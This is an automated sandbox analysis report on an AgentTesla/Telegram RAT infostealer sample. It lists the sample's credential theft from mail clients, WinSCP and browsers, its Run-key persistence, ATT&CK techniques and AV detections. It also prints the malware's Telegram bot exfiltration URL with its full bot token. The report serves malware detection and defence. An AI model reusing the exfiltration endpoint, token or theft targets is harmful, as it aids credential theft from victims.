              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EF6D0 GetUserNameW,

              Stealing of Sensitive Information

              barindex
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Yara detected AgentTesla
              Source: Yara matchFile source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Yara detected AgentTesla
              Source: Yara matchFile source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation              		11
              Registry Run Keys / Startup Folder              		112
              Process Injection              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              Account Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Web Service              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              PowerShell              		Boot or Logon Initialization Scripts11
              Registry Run Keys / Startup Folder              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              File and Directory Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		1
              Credentials in Registry              		114
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration11
              Encrypted Channel              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Masquerading              		NTDS211
              Security Software Discovery              		Distributed Component Object Model21
              Input Capture              		Scheduled Transfer3
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
              Virtualization/Sandbox Evasion              		LSA Secrets2
              Process Discovery              		SSH1
              Clipboard Data              		Data Transfer Size Limits14
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common112
              Process Injection              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Hidden Files and Directories              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Remote System Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              System Network Configuration Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830846 Sample: izwFjkhFJm.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 57 api4.ipify.org 2->57 59 api.telegram.org 2->59 61 api.ipify.org 2->61 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Yara detected Telegram RAT 2->75 77 5 other signatures 2->77 8 izwFjkhFJm.exe 1 8 2->8         started        12 Oefdyik.exe 4 2->12         started        14 kDPmkTm.exe 3 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\...\Oefdyik.exe, PE32 8->51 dropped 53 C:\Users\user\...\Oefdyik.exe:Zone.Identifier, ASCII 8->53 dropped 55 C:\Users\user\AppData\...\izwFjkhFJm.exe.log, ASCII 8->55 dropped 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->91 93 May check the online IP address of the machine 8->93 95 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->95 103 3 other signatures 8->103 18 izwFjkhFJm.exe 17 5 8->18         started        23 powershell.exe 16 8->23         started        25 izwFjkhFJm.exe 8->25         started        37 2 other processes 8->37 97 Multi AV Scanner detection for dropped file 12->97 99 Machine Learning detection for dropped file 12->99 101 Encrypted powershell cmdline option found 12->101 27 Oefdyik.exe 12->27         started        29 powershell.exe 12->29         started        31 Oefdyik.exe 12->31         started        33 powershell.exe 14->33         started        35 powershell.exe 16->35         started        signatures6 process7 dnsIp8 63 api4.ipify.org 173.231.16.76, 443, 49699, 49702 WEBNXUS United States 18->63 65 api.telegram.org 149.154.167.220, 443, 49701, 49715 TELEGRAMRU United Kingdom 18->65 67 api.ipify.org 18->67 47 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->47 dropped 49 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->49 dropped 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->79 81 Tries to steal Mail credentials (via file / registry access) 18->81 83 Creates multiple autostart registry keys 18->83 39 conhost.exe 23->39         started        69 api.ipify.org 27->69 85 Tries to harvest and steal browser information (history, passwords, etc) 27->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->87 89 Installs a global keyboard hook 27->89 41 conhost.exe 29->41         started        43 conhost.exe 33->43         started        45 conhost.exe 35->45         started        file9 signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              izwFjkhFJm.exe33%ReversingLabsByteCode-MSIL.Packed.Generic
              izwFjkhFJm.exe53%VirustotalBrowse
              izwFjkhFJm.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe53%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe33%ReversingLabsByteCode-MSIL.Packed.Generic
              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe33%ReversingLabsByteCode-MSIL.Packed.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              27.2.Oefdyik.exe.400000.0.unpack100%AviraHEUR/AGEN.1215472Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.telegram.org40%URL Reputationsafe
              https://urn.to/r/sds_see0%URL Reputationsafe
              https://urn.to/r/sds_see0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api4.ipify.org
              		173.231.16.76
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  api.ipify.org
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high
                      https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org4izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.newtonsoft.com/jsonschemakDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.newtonsoft.com/jsonkDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.nuget.org/packages/Newtonsoft.Json.BsonizwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://urn.to/r/sds_seeizwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://api.telegram.orgizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://james.newtonking.com/projects/jsonOefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        173.231.16.76
                                        		api4.ipify.orgUnited States
                                        		18450WEBNXUSfalse

                                        General Information

                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:830846
                                        Start date and time:2023-03-20 18:29:52 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 52s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:izwFjkhFJm.exe
                                        Original Sample Name:ae2a3b41292c66a9dd6f10c874c05293.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@29/16@8/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.126.32.137, 20.190.160.13, 40.126.32.69, 40.126.32.132, 20.190.160.15, 20.190.160.23, 40.126.32.67, 20.190.160.21, 13.89.179.12
                                        • Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v6.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:30:59API Interceptor90x Sleep call for process: powershell.exe modified
                                        18:31:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        18:31:31API Interceptor590x Sleep call for process: izwFjkhFJm.exe modified
                                        18:31:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        18:31:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        18:31:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        18:32:48API Interceptor17x Sleep call for process: Oefdyik.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Oefdyik.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1459
                                        Entropy (8bit):5.3420905847574325
                                        Encrypted:false
                                        SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                        MD5:FB4B7720101F874710FF986326F7980F
                                        SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                        SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                        SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\izwFjkhFJm.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1459
                                        Entropy (8bit):5.3420905847574325
                                        Encrypted:false
